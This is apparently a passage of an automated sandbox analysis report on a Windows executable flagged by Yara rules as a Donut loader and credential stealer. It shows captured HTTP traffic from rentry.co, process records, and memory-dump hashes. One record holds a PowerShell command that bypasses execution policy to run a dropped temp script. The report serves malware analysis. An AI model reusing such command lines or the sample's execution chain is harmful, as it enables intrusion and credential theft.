                                                                                                                                                2025-01-28 15:13:37 UTC465INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                                                                                Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                                                                                2025-01-28 15:13:37 UTC1369INData Raw: 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65
                                                                                                                                                Data Ascii: , custom urls and editing." /> <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta prope
                                                                                                                                                2025-01-28 15:13:37 UTC1369INData Raw: 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e
                                                                                                                                                Data Ascii: "(prefers-color-scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.
                                                                                                                                                2025-01-28 15:13:37 UTC1257INData Raw: 22 64 61 72 6b 4d 6f 64 65 42 74 6e 22 20 74 69 74 6c 65 3d 22 44 61 72 6b 2f 6c 69 67 68 74 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69
                                                                                                                                                Data Ascii: "darkModeBtn" title="Dark/light mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.mi
                                                                                                                                                2025-01-28 15:13:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                • File
                                                                                                                                                • Registry

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:10:12:08
                                                                                                                                                Start date:28/01/2025
                                                                                                                                                Path:C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'730'416 bytes
                                                                                                                                                MD5 hash:C6107E0D217C3CE4F5D8C6198622556B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1908607385.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true
                                                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:10:13:36
                                                                                                                                                Start date:28/01/2025
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1"
                                                                                                                                                Imagebase:0xdc0000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:10:13:37
                                                                                                                                                Start date:28/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Non-executed Functions

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000003.2246120073.0000000000830000.00000004.00000020.00020000.00000000.sdmp, Offset: 00832000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_3_832000_#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 36ee85feecd927fa95baf7906679419c080237d0ab73474c711f4f18ffa90b7c
                                                                                                                                                • Instruction ID: 1b0f7648f18be8e1e496cb5c4173869f8701c700918e7885e54ed719db80da94
                                                                                                                                                • Opcode Fuzzy Hash: 36ee85feecd927fa95baf7906679419c080237d0ab73474c711f4f18ffa90b7c
                                                                                                                                                • Instruction Fuzzy Hash: 83C1CD6544E3C50FD7178B70496A051BFB0BE63204B1EC6DFC8C98F4A3D359A94AE7A2

                                                                                                                                                Executed Functions

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2265159886.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7790000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ac4a1dbcf99fa88016973b5eb448d014c77eebc6232cdac1f542eff2cb59585f
                                                                                                                                                • Instruction ID: b4535628b79aac8926f958ac5bf63f4f5ee8fe1b4e4405f8e1e62ff112c26146
                                                                                                                                                • Opcode Fuzzy Hash: ac4a1dbcf99fa88016973b5eb448d014c77eebc6232cdac1f542eff2cb59585f
                                                                                                                                                • Instruction Fuzzy Hash: C7124AB1B0534B9FDF119B78A4017AAB7A29FC22A4F54C4BAD505CF251DB32CC52C7A2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 134322068e5eb7708b9372735d47b24a443409cae5c99e33d65c5e163931814f
                                                                                                                                                • Instruction ID: 1badf5999ee6a4f80bc6ada0fee5676deb0e682dc5b862d377ad5f30915d7981
                                                                                                                                                • Opcode Fuzzy Hash: 134322068e5eb7708b9372735d47b24a443409cae5c99e33d65c5e163931814f
                                                                                                                                                • Instruction Fuzzy Hash: B712A170A00245DFCB05CF98C484AAEFBB2FF49314B298599D555EB361C335EC91CBA4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2265159886.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7790000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 0a936922e2aacb2b7fbb690c27c04c41702b796b7cc47df5eef64c33cb24cf45
                                                                                                                                                • Instruction ID: 786f153a450f656c55305075ca7f580fbecb7b317c6a4b5a59a69938fafdbcdf
                                                                                                                                                • Opcode Fuzzy Hash: 0a936922e2aacb2b7fbb690c27c04c41702b796b7cc47df5eef64c33cb24cf45
                                                                                                                                                • Instruction Fuzzy Hash: 05414BF1B0130BDFDF208F68A5017A677A29F812C4B99C5B5D4019F251DB32DD62C7A2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1364a101bb50105434cb1bc38dd459ea33dbbde66df33f0026326c19d21471b1
                                                                                                                                                • Instruction ID: b573f66dca826b193869d51ac41a5a734f4ada7b8ea883c07f784913b3f99a3c
                                                                                                                                                • Opcode Fuzzy Hash: 1364a101bb50105434cb1bc38dd459ea33dbbde66df33f0026326c19d21471b1
                                                                                                                                                • Instruction Fuzzy Hash: A0413974A00205DFDB06CF99C598AAEFBB2FF48354B1585AAD505AB364C732EC50CBA4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a843d41f30223dbad0edf0a84ca106ed72be320c4b6501a29f8b4ab599f3bd0c
                                                                                                                                                • Instruction ID: 1b8c5e79b8bde13232c11f4bd96dc797ad93d06dc37e9a0971aa2612d9d78531
                                                                                                                                                • Opcode Fuzzy Hash: a843d41f30223dbad0edf0a84ca106ed72be320c4b6501a29f8b4ab599f3bd0c
                                                                                                                                                • Instruction Fuzzy Hash: 55213B74E04219DFCB00CF98D884AAABBB1FF89310B158596E919EB352C735ED41CFA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 87e11a7ddf3d379e678d1be89428683c776d66148502878d105f2bb00ffa0bdc
                                                                                                                                                • Instruction ID: 1aa492f32233f79c051d688d4fdab36884ce30c390174248c7db38018c72b210
                                                                                                                                                • Opcode Fuzzy Hash: 87e11a7ddf3d379e678d1be89428683c776d66148502878d105f2bb00ffa0bdc
                                                                                                                                                • Instruction Fuzzy Hash: D9215C74A042599FCB01DF9CD4809AEFBB5FF89310B1584AAE909EB352C331EC41CBA5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2256761066.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2eed000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 452f18bbf528311fcf457bd293dbabda0aeec3c1b6abf019d5d5f87d7f8f6256
                                                                                                                                                • Instruction ID: 27f52c232c4007ecb09d90d4a16ff8ec0063c582c4467c59f2f1faea123a0854
                                                                                                                                                • Opcode Fuzzy Hash: 452f18bbf528311fcf457bd293dbabda0aeec3c1b6abf019d5d5f87d7f8f6256
                                                                                                                                                • Instruction Fuzzy Hash: D1014C6100E3C09FD7128B258C94B62BFB8DF43228F1DC1DBD8888F1A3C2695849CB72
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2256761066.0000000002EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EED000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2eed000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6ddb996924d22d1c6d730678cfd372e2a4456d69a3bc71a76da0050c211c1f1d
                                                                                                                                                • Instruction ID: 5148642e3bda915a07933ab1d4f2550a8fc1bc6fd33805873dc410636158daa6
                                                                                                                                                • Opcode Fuzzy Hash: 6ddb996924d22d1c6d730678cfd372e2a4456d69a3bc71a76da0050c211c1f1d
                                                                                                                                                • Instruction Fuzzy Hash: 4A012631048304AFEB209E21CC80BA7BBDCDF41238F0CD01AED4A4B242C3799881CAB2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2257395610.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_2fd0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 89affe93dd524a7bc249b15092a42ec99cb2042b1d1ce924d63f336bf6d394a8
                                                                                                                                                • Instruction ID: c53367da4da0401efafd48cf950c329c365911e2625912b2ff41e2e78ad71c38
                                                                                                                                                • Opcode Fuzzy Hash: 89affe93dd524a7bc249b15092a42ec99cb2042b1d1ce924d63f336bf6d394a8
                                                                                                                                                • Instruction Fuzzy Hash: BD01F731A083559FDB02DB98C8A06D9FBB2FF8A310B1A8096C945DB252C731AC95CB95

                                                                                                                                                Non-executed Functions

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.2265159886.0000000007790000.00000040.00000800.00020000.00000000.sdmp, Offset: 07790000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7790000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: pl$pl$pl$pl
                                                                                                                                                • API String ID: 0-1611185517
                                                                                                                                                • Opcode ID: 83fb9e69c90cec5fee265edfe840e09b31a4cd752a8d7bd34de4d715235c5e30
                                                                                                                                                • Instruction ID: 8f5064e88cd85a08cfd2dc322913079dae3504640443223d4a2ee5b9de9e41ec
                                                                                                                                                • Opcode Fuzzy Hash: 83fb9e69c90cec5fee265edfe840e09b31a4cd752a8d7bd34de4d715235c5e30
                                                                                                                                                • Instruction Fuzzy Hash: BDF139B270520ADFDF159B68A5006AABBF2AFC6250F14C5BAD445CB251DB32CD12C7A1